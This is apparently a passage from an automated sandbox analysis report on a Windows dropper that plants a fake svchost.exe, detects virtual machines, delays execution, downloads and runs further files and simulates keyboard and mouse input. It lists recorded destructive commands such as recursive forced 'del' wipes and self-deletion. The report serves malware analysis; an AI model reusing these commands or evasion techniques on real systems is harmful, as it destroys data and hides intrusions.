                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000410Jump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000810Jump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000411Jump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000044BJump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000043FJump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000412Jump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000440Jump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000426Jump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000427Jump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000083EJump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000043EJump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000450Jump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000414Jump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000415Jump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000416Jump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000816Jump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000418Jump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000419Jump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000C1AJump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000081AJump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000041BJump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000424Jump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00002C0AJump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000400AJump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000340AJump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000240AJump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000140AJump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001C0AJump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000300AJump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000440AJump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000100AJump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000480AJump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000080AJump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00004C0AJump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000180AJump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00003C0AJump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000280AJump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000500AJump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000C0AJump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000380AJump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000200AJump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000441Jump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000081DJump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000041DJump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000045AJump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000041EJump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000041FJump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000422Jump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000042AJump to behavior
                Source: C:\Windows\Temp\ .exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_ComputerSystem WHERE Name=&quot;user-PC&quot;
                Source: C:\Windows\Temp\server.exeLast function: Thread delayed
                Source: C:\Windows\Temp\server.exeLast function: Thread delayed
                Source: C:\Windows\Temp\v5.exeLast function: Thread delayed
                Source: C:\Windows\Temp\v5.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\033726\svchost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\033726\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeCode function: 0_2_00405302 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00405302
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeCode function: 0_2_0040263E FindFirstFileA,0_2_0040263E
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeCode function: 0_2_00405CD8 FindFirstFileA,FindClose,0_2_00405CD8
                Source: C:\Windows\Temp\server.exeCode function: 3_2_10001A20 GetSystemDirectoryA,wsprintfA,wsprintfA,CreateFileA,CloseHandle,Sleep,Sleep,FindFirstFileA,GetCurrentDirectoryA,strstr,Sleep,GetVersionExA,GetSystemDefaultLCID,Sleep,Sleep,GetLocalTime,wsprintfA,_mkdir,Sleep,GetModuleFileNameA,CopyFileA,wsprintfA,wsprintfA,BeginUpdateResourceA,UpdateResourceA,EndUpdateResourceW,CloseHandle,Sleep,ShellExecuteA,Sleep,GetWindowsDirectoryA,wsprintfA,wsprintfA,_mkdir,_mkdir,_mkdir,_mkdir,URLDownloadToFileA,Sleep,ShellExecuteA,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,3_2_10001A20
                Source: C:\Windows\Temp\server.exeCode function: 3_2_100014B0 GetSystemDirectoryA,FindFirstFileA,CreateFileA,ReadFile,wsprintfA,wsprintfA,CloseHandle,wsprintfA,lstrlen,lstrlen,wsprintfA,lstrlen,3_2_100014B0
                Source: C:\Windows\Temp\server.exeCode function: 3_2_10008B50 lstrlen,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,??2@YAPAXI@Z,??3@YAXPAX@Z,wsprintfA,FindNextFileA,FindClose,3_2_10008B50
                Source: C:\Windows\Temp\server.exeCode function: 3_2_10008520 LocalAlloc,wsprintfA,FindFirstFileA,LocalReAlloc,lstrlen,FindNextFileA,LocalFree,FindClose,3_2_10008520
                Source: C:\Windows\Temp\server.exeCode function: 3_2_10008E40 FindFirstFileA,FindClose,FindClose,3_2_10008E40
                Source: C:\Windows\Temp\server.exeCode function: 3_2_100086F0 wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,3_2_100086F0
                Source: C:\Windows\Temp\server.exeCode function: 3_2_10008F00 FindFirstFileA,FindClose,CreateFileA,CloseHandle,3_2_10008F00
                Source: C:\Windows\Temp\ .exeCode function: 5_2_0045B051 __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,5_2_0045B051
                Source: C:\Windows\Temp\ .exeCode function: 5_2_00405260 FindFirstFileA,GetFileAttributesA,SetFileAttributesA,RemoveDirectoryA,DeleteFileA,FindNextFileA,FindClose,5_2_00405260
                Source: C:\Windows\Temp\ .exeCode function: 5_2_00439D40 #17,__time32,FindFirstFileA,DeleteFileA,5_2_00439D40
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_10001A20 GetSystemDirectoryA,wsprintfA,wsprintfA,CreateFileA,CloseHandle,Sleep,Sleep,FindFirstFileA,GetCurrentDirectoryA,strstr,Sleep,GetVersionExA,GetSystemDefaultLCID,Sleep,Sleep,GetLocalTime,wsprintfA,_mkdir,Sleep,GetModuleFileNameA,CopyFileA,wsprintfA,wsprintfA,BeginUpdateResourceA,UpdateResourceA,EndUpdateResourceW,CloseHandle,Sleep,ShellExecuteA,Sleep,GetWindowsDirectoryA,wsprintfA,wsprintfA,_mkdir,_mkdir,_mkdir,_mkdir,URLDownloadToFileA,Sleep,ShellExecuteA,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,8_2_10001A20
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_10008B50 lstrlen,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,??2@YAPAXI@Z,??3@YAXPAX@Z,wsprintfA,FindNextFileA,FindClose,8_2_10008B50
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_100014B0 GetSystemDirectoryA,FindFirstFileA,CreateFileA,ReadFile,wsprintfA,wsprintfA,CloseHandle,wsprintfA,lstrlen,lstrlen,wsprintfA,lstrlen,8_2_100014B0
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_10008520 LocalAlloc,wsprintfA,FindFirstFileA,LocalReAlloc,lstrlen,FindNextFileA,LocalFree,FindClose,8_2_10008520
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_10008E40 FindFirstFileA,FindClose,FindClose,8_2_10008E40
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_100086F0 wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,8_2_100086F0
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_10008F00 FindFirstFileA,FindClose,CreateFileA,CloseHandle,8_2_10008F00
                Source: C:\Windows\Temp\server.exeCode function: 3_2_1000AA30 wsprintfA,wsprintfA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,wsprintfA,GetTickCount,wsprintfA,GetComputerNameA,GetUserNameA,wsprintfA,GetLogicalDriveStringsA,lstrlen,GetVolumeInformationA,SHGetFileInfo,lstrlen,lstrlen,GetDiskFreeSpaceExA,lstrlen,wsprintfA,wsprintfA,GlobalMemoryStatusEx,GlobalMemoryStatusEx,wsprintfA,GlobalMemoryStatusEx,wsprintfA,wsprintfA,lstrlen,wsprintfA,_strrev,_strrev,_strrev,_strrev,wsprintfA,wsprintfA,3_2_1000AA30
                Source: C:\Windows\Temp\v5.exeCode function: 2_2_00406090 6D0C6DE0,LoadLibraryA,6D0C6DE0,LoadLibraryA,6D0C6DE0,GetSystemDefaultUILanguage,memset,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,sprintf,_mbscpy,lstrcpy,RegQueryValueExA,GetSystemInfo,memset,sprintf,_mbscpy,_mbscpy,GlobalMemoryStatusEx,__aulldiv,__aulldiv,wsprintfA,malloc,GetAdaptersInfo,free,malloc,GetAdaptersInfo,strcmp,GetIfTable,??2@YAPAXI@Z,GetIfTable,sprintf,_mbscpy,sprintf,_mbscpy,??3@YAXPAX@Z,free,GetTickCount,2_2_00406090
                Source: C:\Windows\Temp\server.exeThread delayed: delay time: 180000Jump to behavior
                Source: C:\Windows\Temp\server.exeThread delayed: delay time: 60000Jump to behavior
                Source: C:\Windows\Temp\server.exeThread delayed: delay time: 1200000Jump to behavior
                Source: C:\Windows\Temp\server.exeThread delayed: delay time: 60000Jump to behavior
                Source: C:\Windows\Temp\server.exeThread delayed: delay time: 180000Jump to behavior
                Source: C:\Windows\SysWOW64\033726\svchost.exeThread delayed: delay time: 180000
                Source: C:\Windows\SysWOW64\033726\svchost.exeThread delayed: delay time: 60000
                Source: C:\Windows\SysWOW64\033726\svchost.exeThread delayed: delay time: 1200000
                Source: C:\Windows\SysWOW64\033726\svchost.exeThread delayed: delay time: 180000
                Source: C:\Windows\Temp\ .exeFile opened: C:\Users\user\AppData\Local\Microsoft\WindowsJump to behavior
                Source: C:\Windows\Temp\ .exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                Source: C:\Windows\Temp\ .exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\History\desktop.iniJump to behavior
                Source: C:\Windows\Temp\ .exeFile opened: C:\Users\user\AppDataJump to behavior
                Source: C:\Windows\Temp\ .exeFile opened: C:\Users\user\AppData\Local\MicrosoftJump to behavior
                Source: C:\Windows\Temp\ .exeFile opened: C:\Users\userJump to behavior
                Source: server.exe, 00000003.00000002.2683900710.000000000067D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll:
                Source: server.exe, 00000003.00000002.2683900710.00000000006B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: server.exe, 00000003.00000002.2683900710.00000000006F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lSTORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: .exe.0.drBinary or memory string: 00-50-56 VMWare, Inc.
                Source: v5.exe, 00000002.00000002.1330252488.0000000000794000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\-
                Source: server.exe, 00000003.00000002.2683900710.00000000006F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}}}
                Source: .exe.0.drBinary or memory string: 00-1C-14 VMware, Inc
                Source: .exe.0.drBinary or memory string: 00-0C-29 VMware, Inc.
                Source: svchost.exe, 00000008.00000002.2659797363.0000000000885000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}[
                Source: v5.exe, 00000004.00000003.2013456576.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1494703239.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1494804882.00000000006C9000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1813321224.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1788077002.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1734581133.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1634021026.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2237287822.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1446219800.00000000006C9000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000002.2594829199.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2558799404.00000000006C3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: v5.exe, 00000004.00000003.2013456576.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1494703239.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1494804882.00000000006C9000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1813321224.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1788077002.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1734581133.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1634021026.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2237287822.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1446219800.00000000006C9000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000002.2594829199.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2558799404.00000000006C3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWF
                Source: .exe.0.drBinary or memory string: 00-05-69 VMWARE, Inc.
                Source: .exe, 00000005.00000003.1360796714.0000000002456000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 00-1C-14 VMware, IncG
                Source: svchost.exe, 00000008.00000002.2651704250.000000000084C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: v5.exe, 00000004.00000002.2594829199.0000000000678000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: v5.exe, 00000002.00000002.1330252488.000000000076D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2631462911.0000000000812000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeAPI call chain: ExitProcess graph end nodegraph_0-3101
                Source: C:\Windows\Temp\v5.exeAPI call chain: ExitProcess graph end nodegraph_2-1409
                Source: C:\Windows\Temp\server.exeAPI call chain: ExitProcess graph end nodegraph_3-20248
                Source: C:\Windows\Temp\server.exeAPI call chain: ExitProcess graph end nodegraph_3-20271
                Source: C:\Windows\Temp\server.exeAPI call chain: ExitProcess graph end nodegraph_3-20269
                Source: C:\Windows\Temp\server.exeAPI call chain: ExitProcess graph end nodegraph_3-20255
                Source: C:\Windows\Temp\server.exeAPI call chain: ExitProcess graph end nodegraph_3-19464
                Source: C:\Windows\Temp\server.exeAPI call chain: ExitProcess graph end nodegraph_3-19945
                Source: C:\Windows\SysWOW64\033726\svchost.exeAPI call chain: ExitProcess graph end node
                Source: C:\Windows\SysWOW64\033726\svchost.exeAPI call chain: ExitProcess graph end node
                Source: C:\Windows\SysWOW64\033726\svchost.exeAPI call chain: ExitProcess graph end node
                Source: C:\Windows\SysWOW64\033726\svchost.exeAPI call chain: ExitProcess graph end node
                Source: C:\Windows\SysWOW64\033726\svchost.exeAPI call chain: ExitProcess graph end node
                Source: C:\Windows\SysWOW64\033726\svchost.exeAPI call chain: ExitProcess graph end node
                Source: C:\Windows\Temp\server.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Temp\server.exeCode function: 3_2_1000F3A0 BlockInput,BlockInput,3_2_1000F3A0
                Source: C:\Windows\Temp\server.exeCode function: 3_2_100018A0 wsprintfA,CreateToolhelp32Snapshot,Process32First,_strcmpi,GetCurrentProcessId,OpenProcess,GetModuleFileNameExA,K32GetModuleFileNameExA,_strcmpi,CloseHandle,Process32Next,CloseHandle,3_2_100018A0
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeCode function: 0_2_00405CFF GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405CFF
                Source: C:\Windows\Temp\server.exeCode function: 3_2_00401000 VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualAlloc,VirtualAlloc,3_2_00401000
                Source: C:\Windows\Temp\ .exeCode function: 5_2_0044F257 SetUnhandledExceptionFilter,5_2_0044F257
                Source: C:\Windows\Temp\ .exeCode function: 5_2_0044F26B SetUnhandledExceptionFilter,5_2_0044F26B
                Source: C:\Windows\Temp\server.exeCode function: 3_2_1000F840 mouse_event,SetCursorPos,WindowFromPoint,SetCapture,MapVirtualKeyA,keybd_event,MapVirtualKeyA,keybd_event,mouse_event,mouse_event,3_2_1000F840
                Source: C:\Windows\Temp\server.exeCode function: 3_2_1000F840 mouse_event,SetCursorPos,WindowFromPoint,SetCapture,MapVirtualKeyA,keybd_event,MapVirtualKeyA,keybd_event,mouse_event,mouse_event,3_2_1000F840
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeProcess created: C:\Windows\Temp\v5.exe "C:\Windows\temp\v5.exe" Jump to behavior
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeProcess created: C:\Windows\Temp\server.exe "C:\Windows\temp\server.exe" Jump to behavior
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeProcess created: C:\Windows\Temp\ .exe "C:\Windows\temp\ .exe" Jump to behavior
                Source: C:\Windows\Temp\v5.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c del C:\Windows\temp\v5.exe > nulJump to behavior
                Source: C:\Windows\Temp\server.exeProcess created: C:\Windows\SysWOW64\033726\svchost.exe "C:\Windows\system32\033726\svchost.exe" Jump to behavior
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exitJump to behavior
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exitJump to behavior
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exitJump to behavior
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exitJump to behavior
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exitJump to behavior
